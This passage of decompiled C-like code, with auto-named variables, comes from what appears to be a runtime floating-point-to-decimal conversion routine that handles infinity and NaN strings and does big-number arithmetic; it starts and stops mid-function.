				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
				intOrPtr _v1900;
				signed int _v1904;
				signed int _v1908;
				signed int _v1912;
				signed int _v1916;
				signed int _v1920;
				signed int _v1924;
				signed int _v1928;
				char _v1936;
				char _v1944;
				char _v2404;
				signed int _v2408;
				signed int _t743;
				signed int _t753;
				signed int _t754;
				intOrPtr _t763;
				signed int _t764;
				intOrPtr _t767;
				intOrPtr _t770;
				intOrPtr _t772;
				intOrPtr _t773;
				void* _t774;
				signed int _t778;
				signed int _t779;
				signed int _t785;
				signed int _t791;
				intOrPtr _t793;
				void* _t794;
				signed int _t795;
				signed int _t796;
				signed int _t797;
				signed int _t806;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t816;
				signed int _t817;
				signed int _t818;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t828;
				signed int _t829;
				signed int _t835;
				signed int _t836;
				signed int _t839;
				signed int _t844;
				signed int _t852;
				signed int* _t855;
				signed int _t859;
				signed int _t870;
				signed int _t871;
				signed int _t873;
				char* _t874;
				signed int _t877;
				signed int _t881;
				signed int _t882;
				signed int _t887;
				signed int _t889;
				signed int _t894;
				signed int _t903;
				signed int _t906;
				signed int _t908;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t916;
				signed int _t929;
				signed int _t930;
				signed int _t932;
				char* _t933;
				signed int _t936;
				signed int _t940;
				signed int _t941;
				signed int* _t943;
				signed int _t946;
				signed int _t948;
				signed int _t953;
				signed int _t961;
				signed int _t964;
				signed int _t968;
				signed int* _t975;
				intOrPtr _t977;
				void* _t978;
				intOrPtr* _t980;
				signed int* _t984;
				unsigned int _t995;
				signed int _t996;
				void* _t999;
				signed int _t1000;
				void* _t1002;
				signed int _t1003;
				signed int _t1004;
				signed int _t1005;
				signed int _t1015;
				signed int _t1020;
				signed int _t1023;
				unsigned int _t1026;
				signed int _t1027;
				void* _t1030;
				signed int _t1031;
				void* _t1033;
				signed int _t1034;
				signed int _t1035;
				signed int _t1036;
				signed int _t1041;
				signed int* _t1046;
				signed int _t1048;
				signed int _t1058;
				void _t1061;
				signed int _t1064;
				void* _t1067;
				void* _t1074;
				signed int _t1080;
				signed int _t1081;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1089;
				signed int _t1093;
				signed int _t1097;
				signed int _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1102;
				signed int _t1103;
				signed int _t1104;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				signed int _t1112;
				signed int _t1113;
				unsigned int _t1114;
				void* _t1117;
				intOrPtr _t1119;
				signed int _t1120;
				signed int _t1121;
				signed int _t1122;
				signed int* _t1126;
				void* _t1130;
				void* _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				signed int _t1146;
				signed int _t1149;
				char _t1154;
				signed int _t1156;
				signed int _t1157;
				signed int _t1158;
				signed int _t1159;
				signed int _t1160;
				signed int _t1161;
				signed int _t1162;
				signed int _t1166;
				signed int _t1167;
				signed int _t1168;
				signed int _t1169;
				signed int _t1170;
				unsigned int _t1173;
				void* _t1177;
				void* _t1178;
				unsigned int _t1179;
				signed int _t1184;
				signed int _t1185;
				signed int _t1187;
				signed int _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1197;
				signed int _t1199;
				signed int _t1200;
				void* _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				void* _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int* _t1215;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				intOrPtr* _t1221;
				intOrPtr* _t1222;
				signed int _t1224;
				signed int _t1226;
				signed int _t1229;
				signed int _t1235;
				signed int _t1239;
				signed int _t1240;
				signed int _t1245;
				signed int _t1248;
				signed int _t1249;
				signed int _t1250;
				signed int _t1251;
				signed int _t1252;
				signed int _t1253;
				signed int _t1255;
				signed int _t1256;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1273;
				signed int _t1276;
				signed int _t1278;
				signed int* _t1279;
				signed int* _t1282;
				signed int _t1291;

				_t1145 = __edx;
				_t1276 = _t1278;
				_t1279 = _t1278 - 0x964;
				_t743 =  *0x25b018; // 0x6083b07a
				_v8 = _t743 ^ _t1276;
				_t1058 = _a20;
				_push(__esi);
				_push(__edi);
				_t1190 = _a16;
				_v1924 = _t1190;
				_v1920 = _t1058;
				E0024C94B( &_v1944, __eflags);
				_t1239 = _a8;
				_t748 = 0x2d;
				if((_t1239 & 0x80000000) == 0) {
					_t748 = 0x120;
				}
				 *_t1190 = _t748;
				 *((intOrPtr*)(_t1190 + 8)) = _t1058;
				_t1191 = _a4;
				if((_t1239 & 0x7ff00000) != 0) {
					L5:
					_t753 = E00248556( &_a4);
					_pop(_t1073);
					__eflags = _t753;
					if(_t753 != 0) {
						_t1073 = _v1924;
						 *((intOrPtr*)(_v1924 + 4)) = 1;
					}
					_t754 = _t753 - 1;
					__eflags = _t754;
					if(_t754 == 0) {
						_push("1#INF");
						goto L308;
					} else {
						_t778 = _t754 - 1;
						__eflags = _t778;
						if(_t778 == 0) {
							_push("1#QNAN");
							goto L308;
						} else {
							_t779 = _t778 - 1;
							__eflags = _t779;
							if(_t779 == 0) {
								_push("1#SNAN");
								goto L308;
							} else {
								__eflags = _t779 == 1;
								if(_t779 == 1) {
									_push("1#IND");
									goto L308;
								} else {
									_v1928 = _v1928 & 0x00000000;
									_a4 = _t1191;
									_a8 = _t1239 & 0x7fffffff;
									_t1291 = _a4;
									asm("fst qword [ebp-0x768]");
									_t1193 = _v1896;
									_v1916 = _a12 + 1;
									_t1080 = _t1193 >> 0x14;
									_t785 = _t1080 & 0x000007ff;
									__eflags = _t785;
									if(_t785 != 0) {
										_t1146 = 0;
										_t785 = 0;
										__eflags = 0;
									} else {
										_t1146 = 1;
									}
									_t1194 = _t1193 & 0x000fffff;
									_t1061 = _v1900 + _t785;
									asm("adc edi, esi");
									__eflags = _t1146;
									_t1081 = _t1080 & 0x000007ff;
									_t1245 = _t1081 - 0x434 + (0 | _t1146 != 0x00000000) + 1;
									_v1872 = _t1245;
									E0024F300(_t1081, _t1291);
									_push(_t1081);
									_push(_t1081);
									 *_t1279 = _t1291;
									_t791 = E002522B0(E0024F410(_t1194, _t1245), _t1291);
									_v1904 = _t791;
									__eflags = _t791 - 0x7fffffff;
									if(_t791 == 0x7fffffff) {
										L16:
										__eflags = 0;
										_v1904 = 0;
									} else {
										__eflags = _t791 - 0x80000000;
										if(_t791 == 0x80000000) {
											goto L16;
										}
									}
									_v468 = _t1061;
									__eflags = _t1194;
									_v464 = _t1194;
									_t1064 = (0 | _t1194 != 0x00000000) + 1;
									_v472 = _t1064;
									__eflags = _t1245;
									if(_t1245 < 0) {
										__eflags = _t1245 - 0xfffffc02;
										if(_t1245 == 0xfffffc02) {
											L101:
											_t793 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t195 =  &_v1896;
											 *_t195 = _v1896 & 0x00000000;
											__eflags =  *_t195;
											asm("bsr eax, eax");
											if( *_t195 == 0) {
												_t1084 = 0;
												__eflags = 0;
											} else {
												_t1084 = _t793 + 1;
											}
											_t794 = 0x20;
											_t795 = _t794 - _t1084;
											__eflags = _t795 - 1;
											_t796 = _t795 & 0xffffff00 | _t795 - 0x00000001 > 0x00000000;
											__eflags = _t1064 - 0x73;
											_v1865 = _t796;
											_t1085 = _t1084 & 0xffffff00 | _t1064 - 0x00000073 > 0x00000000;
											__eflags = _t1064 - 0x73;
											if(_t1064 != 0x73) {
												L107:
												_t797 = 0;
												__eflags = 0;
											} else {
												__eflags = _t796;
												if(_t796 == 0) {
													goto L107;
												} else {
													_t797 = 1;
												}
											}
											__eflags = _t1085;
											if(_t1085 != 0) {
												L126:
												_v1400 = _v1400 & 0x00000000;
												_t224 =  &_v472;
												 *_t224 = _v472 & 0x00000000;
												__eflags =  *_t224;
												E0024A2FE( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t797;
												if(_t797 != 0) {
													goto L126;
												} else {
													_t1112 = 0x72;
													__eflags = _t1064 - _t1112;
													if(_t1064 < _t1112) {
														_t1112 = _t1064;
													}
													__eflags = _t1112 - 0xffffffff;
													if(_t1112 != 0xffffffff) {
														_t1263 = _t1112;
														_t1221 =  &_v468 + _t1112 * 4;
														_v1880 = _t1221;
														while(1) {
															__eflags = _t1263 - _t1064;
															if(_t1263 >= _t1064) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1221;
															}
															_t210 = _t1263 - 1; // 0x70
															__eflags = _t210 - _t1064;
															if(_t210 >= _t1064) {
																_t1173 = 0;
																__eflags = 0;
															} else {
																_t1173 =  *(_t1221 - 4);
															}
															_t1221 = _t1221 - 4;
															_t975 = _v1880;
															_t1263 = _t1263 - 1;
															 *_t975 = _t1173 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t975 - 4;
															__eflags = _t1263 - 0xffffffff;
															if(_t1263 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														_t1245 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1112;
													} else {
														_t218 = _t1112 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1197 = 1 - _t1245;
											E00243C20(_t1197,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1276 + 0xbad63d) = 1 << (_t1197 & 0x0000001f);
											_t806 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1113 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1113;
											__eflags = _t1064 - _t1113;
											if(_t1064 == _t1113) {
												_t1177 = 0;
												__eflags = 0;
												while(1) {
													_t977 =  *((intOrPtr*)(_t1276 + _t1177 - 0x570));
													__eflags = _t977 -  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0));
													if(_t977 !=  *((intOrPtr*)(_t1276 + _t1177 - 0x1d0))) {
														goto L101;
													}
													_t1177 = _t1177 + 4;
													__eflags = _t1177 - 8;
													if(_t1177 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1178 = 0;
															__eflags = 0;
														} else {
															_t1178 = _t977 + 1;
														}
														_t978 = 0x20;
														_t1264 = _t1113;
														__eflags = _t978 - _t1178 - _t1113;
														_t980 =  &_v460;
														_v1880 = _t980;
														_t1222 = _t980;
														_t171 =  &_v1865;
														 *_t171 = _t978 - _t1178 - _t1113 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1264 - _t1064;
															if(_t1264 >= _t1064) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1222;
															}
															_t175 = _t1264 - 1; // 0x0
															__eflags = _t175 - _t1064;
															if(_t175 >= _t1064) {
																_t1179 = 0;
																__eflags = 0;
															} else {
																_t1179 =  *(_t1222 - 4);
															}
															_t1222 = _t1222 - 4;
															_t984 = _v1880;
															_t1264 = _t1264 - 1;
															 *_t984 = _t1179 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t984 - 4;
															__eflags = _t1264 - 0xffffffff;
															if(_t1264 == 0xffffffff) {
																break;
															}
															_t1064 = _v472;
														}
														__eflags = _v1865;
														_t1114 = _t1113 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1113;
														_t1224 = _t1114 >> 5;
														_v1884 = _t1114;
														_t1266 = _t1224 << 2;
														E00243C20(_t1224,  &_v1396, 0, _t1266);
														 *(_t1276 + _t1266 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t806 = _t1224 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t806;
										_t1067 = 0x1cc;
										_v936 = _t806;
										__eflags = _t806 << 2;
										E0024A2FE( &_v932, 0x1cc,  &_v1396, _t806 << 2);
										_t1282 =  &(_t1279[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1267 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1267;
										__eflags = _t1064 - _t1267;
										if(_t1064 != _t1267) {
											L53:
											_t995 = _v1872 + 1;
											_t996 = _t995 & 0x0000001f;
											_t1117 = 0x20;
											_v1876 = _t996;
											_t1226 = _t995 >> 5;
											_v1872 = _t1226;
											_v1908 = _t1117 - _t996;
											_t999 = E00252290(1, _t1117 - _t996, 0);
											_t1119 =  *((intOrPtr*)(_t1276 + _t1064 * 4 - 0x1d4));
											_t1000 = _t999 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t1000;
											_v1912 =  !_t1000;
											if( *_t108 == 0) {
												_t1120 = 0;
												__eflags = 0;
											} else {
												_t1120 = _t1119 + 1;
											}
											_t1002 = 0x20;
											_t1003 = _t1002 - _t1120;
											_t1184 = _t1064 + _t1226;
											__eflags = _v1876 - _t1003;
											_v1892 = _t1184;
											_t1004 = _t1003 & 0xffffff00 | _v1876 - _t1003 > 0x00000000;
											__eflags = _t1184 - 0x73;
											_v1865 = _t1004;
											_t1121 = _t1120 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
											__eflags = _t1184 - 0x73;
											if(_t1184 != 0x73) {
												L59:
												_t1005 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1004;
												if(_t1004 == 0) {
													goto L59;
												} else {
													_t1005 = 1;
												}
											}
											__eflags = _t1121;
											if(_t1121 != 0) {
												L81:
												__eflags = 0;
												_t1067 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E0024A2FE( &_v468, 0x1cc,  &_v1396, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												__eflags = _t1005;
												if(_t1005 != 0) {
													goto L81;
												} else {
													_t1122 = 0x72;
													__eflags = _t1184 - _t1122;
													if(_t1184 >= _t1122) {
														_t1184 = _t1122;
														_v1892 = _t1122;
													}
													_t1015 = _t1184;
													_v1880 = _t1015;
													__eflags = _t1184 - 0xffffffff;
													if(_t1184 != 0xffffffff) {
														_t1185 = _v1872;
														_t1269 = _t1184 - _t1185;
														__eflags = _t1269;
														_t1126 =  &_v468 + _t1269 * 4;
														_v1888 = _t1126;
														while(1) {
															__eflags = _t1015 - _t1185;
															if(_t1015 < _t1185) {
																break;
															}
															__eflags = _t1269 - _t1064;
															if(_t1269 >= _t1064) {
																_t1229 = 0;
																__eflags = 0;
															} else {
																_t1229 =  *_t1126;
															}
															__eflags = _t1269 - 1 - _t1064;
															if(_t1269 - 1 >= _t1064) {
																_t1020 = 0;
																__eflags = 0;
															} else {
																_t1020 =  *(_t1126 - 4);
															}
															_t1023 = _v1880;
															_t1126 = _v1888 - 4;
															_v1888 = _t1126;
															 *(_t1276 + _t1023 * 4 - 0x1d0) = (_t1229 & _v1884) << _v1876 | (_t1020 & _v1912) >> _v1908;
															_t1015 = _t1023 - 1;
															_t1269 = _t1269 - 1;
															_v1880 = _t1015;
															__eflags = _t1015 - 0xffffffff;
															if(_t1015 != 0xffffffff) {
																_t1064 = _v472;
																continue;
															}
															break;
														}
														_t1184 = _v1892;
														_t1226 = _v1872;
														_t1267 = 2;
													}
													__eflags = _t1226;
													if(_t1226 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1226 << 2);
														_t1279 =  &(_t1279[3]);
													}
													__eflags = _v1865;
													_t1067 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1184;
													} else {
														_v472 = _t1184 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1267;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1130 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1276 + _t1130 - 0x570)) -  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0));
												if( *((intOrPtr*)(_t1276 + _t1130 - 0x570)) !=  *((intOrPtr*)(_t1276 + _t1130 - 0x1d0))) {
													goto L53;
												}
												_t1130 = _t1130 + 4;
												__eflags = _t1130 - 8;
												if(_t1130 != 8) {
													continue;
												} else {
													_t1026 = _v1872 + 2;
													_t1027 = _t1026 & 0x0000001f;
													_t1131 = 0x20;
													_t1132 = _t1131 - _t1027;
													_v1888 = _t1027;
													_t1271 = _t1026 >> 5;
													_v1876 = _t1271;
													_v1908 = _t1132;
													_t1030 = E00252290(1, _t1132, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1031 = _t1030 - 1;
													__eflags = _t1031;
													asm("bsr ecx, edi");
													_v1884 = _t1031;
													_v1912 =  !_t1031;
													if(_t1031 == 0) {
														_t1133 = 0;
														__eflags = 0;
													} else {
														_t1133 = _t1132 + 1;
													}
													_t1033 = 0x20;
													_t1034 = _t1033 - _t1133;
													_t1187 = _t1271 + 2;
													__eflags = _v1888 - _t1034;
													_v1880 = _t1187;
													_t1035 = _t1034 & 0xffffff00 | _v1888 - _t1034 > 0x00000000;
													__eflags = _t1187 - 0x73;
													_v1865 = _t1035;
													_t1134 = _t1133 & 0xffffff00 | _t1187 - 0x00000073 > 0x00000000;
													__eflags = _t1187 - 0x73;
													if(_t1187 != 0x73) {
														L28:
														_t1036 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1035;
														if(_t1035 == 0) {
															goto L28;
														} else {
															_t1036 = 1;
														}
													}
													__eflags = _t1134;
													if(_t1134 != 0) {
														L50:
														__eflags = 0;
														_t1067 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E0024A2FE( &_v468, 0x1cc,  &_v1396, 0);
														_t1279 =  &(_t1279[4]);
													} else {
														__eflags = _t1036;
														if(_t1036 != 0) {
															goto L50;
														} else {
															_t1137 = 0x72;
															__eflags = _t1187 - _t1137;
															if(_t1187 >= _t1137) {
																_t1187 = _t1137;
																_v1880 = _t1137;
															}
															_t1138 = _t1187;
															_v1892 = _t1138;
															__eflags = _t1187 - 0xffffffff;
															if(_t1187 != 0xffffffff) {
																_t1188 = _v1876;
																_t1273 = _t1187 - _t1188;
																__eflags = _t1273;
																_t1046 =  &_v468 + _t1273 * 4;
																_v1872 = _t1046;
																while(1) {
																	__eflags = _t1138 - _t1188;
																	if(_t1138 < _t1188) {
																		break;
																	}
																	__eflags = _t1273 - _t1064;
																	if(_t1273 >= _t1064) {
																		_t1235 = 0;
																		__eflags = 0;
																	} else {
																		_t1235 =  *_t1046;
																	}
																	__eflags = _t1273 - 1 - _t1064;
																	if(_t1273 - 1 >= _t1064) {
																		_t1048 = 0;
																		__eflags = 0;
																	} else {
																		_t1048 =  *(_v1872 - 4);
																	}
																	_t1143 = _v1892;
																	 *(_t1276 + _t1143 * 4 - 0x1d0) = (_t1048 & _v1912) >> _v1908 | (_t1235 & _v1884) << _v1888;
																	_t1138 = _t1143 - 1;
																	_t1273 = _t1273 - 1;
																	_t1046 = _v1872 - 4;
																	_v1892 = _t1138;
																	_v1872 = _t1046;
																	__eflags = _t1138 - 0xffffffff;
																	if(_t1138 != 0xffffffff) {
																		_t1064 = _v472;
																		continue;
																	}
																	break;
																}
																_t1187 = _v1880;
																_t1271 = _v1876;
															}
															__eflags = _t1271;
															if(_t1271 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1271 << 2);
																_t1279 =  &(_t1279[3]);
															}
															__eflags = _v1865;
															_t1067 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1187;
															} else {
																_v472 = _t1187 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1041 = 4;
													__eflags = 1;
													_v1396 = _t1041;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1041);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1067);
										_push( &_v932);
										E0024A2FE();
										_t1282 =  &(_t1279[4]);
									}
									_t811 = _v1904;
									_t1087 = 0xa;
									_v1912 = _t1087;
									__eflags = _t811;
									if(_t811 < 0) {
										_t812 =  ~_t811;
										_t813 = _t812 / _t1087;
										_v1880 = _t813;
										_t1088 = _t812 % _t1087;
										_v1884 = _t1088;
										__eflags = _t813;
										if(_t813 == 0) {
											L249:
											__eflags = _t1088;
											if(_t1088 != 0) {
												_t852 =  *(0x2569f4 + _t1088 * 4);
												_v1896 = _t852;
												__eflags = _t852;
												if(_t852 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t852 - 1;
													if(_t852 != 1) {
														_t1099 = _v472;
														__eflags = _t1099;
														if(_t1099 != 0) {
															_t1204 = 0;
															_t1253 = 0;
															__eflags = 0;
															do {
																_t1158 = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) >> 0x20;
																 *(_t1276 + _t1253 * 4 - 0x1d0) = _t852 *  *(_t1276 + _t1253 * 4 - 0x1d0) + _t1204;
																_t852 = _v1896;
																asm("adc edx, 0x0");
																_t1253 = _t1253 + 1;
																_t1204 = _t1158;
																__eflags = _t1253 - _t1099;
															} while (_t1253 != _t1099);
															__eflags = _t1204;
															if(_t1204 != 0) {
																_t859 = _v472;
																__eflags = _t859 - 0x73;
																if(_t859 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1276 + _t859 * 4 - 0x1d0) = _t1204;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t813 - 0x26;
												if(_t813 > 0x26) {
													_t813 = 0x26;
												}
												_t1100 =  *(0x25695e + _t813 * 4) & 0x000000ff;
												_v1872 = _t813;
												_v1400 = ( *(0x25695e + _t813 * 4) & 0x000000ff) + ( *(0x25695f + _t813 * 4) & 0x000000ff);
												E00243C20(_t1100 << 2,  &_v1396, 0, _t1100 << 2);
												_t870 = E002523A0( &(( &_v1396)[_t1100]), 0x256058 + ( *(0x25695c + _v1872 * 4) & 0x0000ffff) * 4, ( *(0x25695f + _t813 * 4) & 0x000000ff) << 2);
												_t1101 = _v1400;
												_t1282 =  &(_t1282[6]);
												_v1892 = _t1101;
												__eflags = _t1101 - 1;
												if(_t1101 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1101 - _v472;
														_t1207 =  &_v1396;
														_t871 = _t870 & 0xffffff00 | _t1101 - _v472 > 0x00000000;
														__eflags = _t871;
														if(_t871 != 0) {
															_t1159 =  &_v468;
														} else {
															_t1207 =  &_v468;
															_t1159 =  &_v1396;
														}
														_v1908 = _t1159;
														__eflags = _t871;
														if(_t871 == 0) {
															_t1101 = _v472;
														}
														_v1876 = _t1101;
														__eflags = _t871;
														if(_t871 != 0) {
															_v1892 = _v472;
														}
														_t1160 = 0;
														_t1255 = 0;
														_v1864 = 0;
														__eflags = _t1101;
														if(_t1101 == 0) {
															L243:
															_v472 = _t1160;
															_t873 = _t1160 << 2;
															__eflags = _t873;
															_push(_t873);
															_t874 =  &_v1860;
															goto L244;
														} else {
															_t1208 = _t1207 -  &_v1860;
															__eflags = _t1208;
															_v1928 = _t1208;
															do {
																_t881 =  *(_t1276 + _t1208 + _t1255 * 4 - 0x740);
																_v1896 = _t881;
																__eflags = _t881;
																if(_t881 != 0) {
																	_t882 = 0;
																	_t1209 = 0;
																	_t1102 = _t1255;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1102 - 0x73;
																		if(_t1102 == 0x73) {
																			goto L258;
																		} else {
																			_t1208 = _v1928;
																			_t1101 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1102 - 0x73;
																			if(_t1102 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1102 - _t1160;
																			if(_t1102 == _t1160) {
																				 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																				_t894 = _t882 + 1 + _t1255;
																				__eflags = _t894;
																				_v1864 = _t894;
																				_t882 = _v1888;
																			}
																			_t889 =  *(_v1908 + _t882 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t889 * _v1896 + _t1209;
																			asm("adc edx, 0x0");
																			_t882 = _v1888 + 1;
																			_t1102 = _t1102 + 1;
																			_v1888 = _t882;
																			_t1209 = _t889 * _v1896 >> 0x20;
																			_t1160 = _v1864;
																			__eflags = _t882 - _v1892;
																			if(_t882 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1209;
																				if(_t1209 == 0) {
																					goto L240;
																				}
																				__eflags = _t1102 - 0x73;
																				if(_t1102 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1102 - _t1160;
																					if(_t1102 == _t1160) {
																						_t558 = _t1276 + _t1102 * 4 - 0x740;
																						 *_t558 =  *(_t1276 + _t1102 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1102 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t887 = _t1209;
																					_t1209 = 0;
																					 *(_t1276 + _t1102 * 4 - 0x740) =  *(_t1276 + _t1102 * 4 - 0x740) + _t887;
																					_t1160 = _v1864;
																					asm("adc edi, edi");
																					_t1102 = _t1102 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1255 - _t1160;
																	if(_t1255 == _t1160) {
																		 *(_t1276 + _t1255 * 4 - 0x740) =  *(_t1276 + _t1255 * 4 - 0x740) & _t881;
																		_t526 = _t1255 + 1; // 0x1
																		_t1160 = _t526;
																		_v1864 = _t1160;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1255 = _t1255 + 1;
																__eflags = _t1255 - _t1101;
															} while (_t1255 != _t1101);
															goto L243;
														}
													} else {
														_t1210 = _v468;
														_v472 = _t1101;
														E0024A2FE( &_v468, _t1067,  &_v1396, _t1101 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1210;
														if(_t1210 == 0) {
															goto L203;
														} else {
															__eflags = _t1210 - 1;
															if(_t1210 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1103 = 0;
																	_v1896 = _v472;
																	_t1256 = 0;
																	__eflags = 0;
																	do {
																		_t903 = _t1210;
																		_t1161 = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) >> 0x20;
																		 *(_t1276 + _t1256 * 4 - 0x1d0) = _t903 *  *(_t1276 + _t1256 * 4 - 0x1d0) + _t1103;
																		asm("adc edx, 0x0");
																		_t1256 = _t1256 + 1;
																		_t1103 = _t1161;
																		__eflags = _t1256 - _v1896;
																	} while (_t1256 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1211 = _v1396;
													__eflags = _t1211;
													if(_t1211 != 0) {
														__eflags = _t1211 - 1;
														if(_t1211 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1104 = 0;
																_v1896 = _v472;
																_t1257 = 0;
																__eflags = 0;
																do {
																	_t908 = _t1211;
																	_t1162 = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) >> 0x20;
																	 *(_t1276 + _t1257 * 4 - 0x1d0) = _t908 *  *(_t1276 + _t1257 * 4 - 0x1d0) + _t1104;
																	asm("adc edx, 0x0");
																	_t1257 = _t1257 + 1;
																	_t1104 = _t1162;
																	__eflags = _t1257 - _v1896;
																} while (_t1257 != _v1896);
																L208:
																__eflags = _t1103;
																if(_t1103 == 0) {
																	goto L245;
																} else {
																	_t906 = _v472;
																	__eflags = _t906 - 0x73;
																	if(_t906 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0024A2FE( &_v468, _t1067,  &_v2404, 0);
																		_t1282 =  &(_t1282[4]);
																		_t877 = 0;
																	} else {
																		 *(_t1276 + _t906 * 4 - 0x1d0) = _t1103;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t874 =  &_v2404;
														L244:
														_push(_t874);
														_push(_t1067);
														_push( &_v468);
														E0024A2FE();
														_t1282 =  &(_t1282[4]);
														L245:
														_t877 = 1;
													}
												}
												L246:
												__eflags = _t877;
												if(_t877 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t855 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t813 = _v1880 - _v1872;
												__eflags = _t813;
												_v1880 = _t813;
											} while (_t813 != 0);
											_t1088 = _v1884;
											goto L249;
										}
									} else {
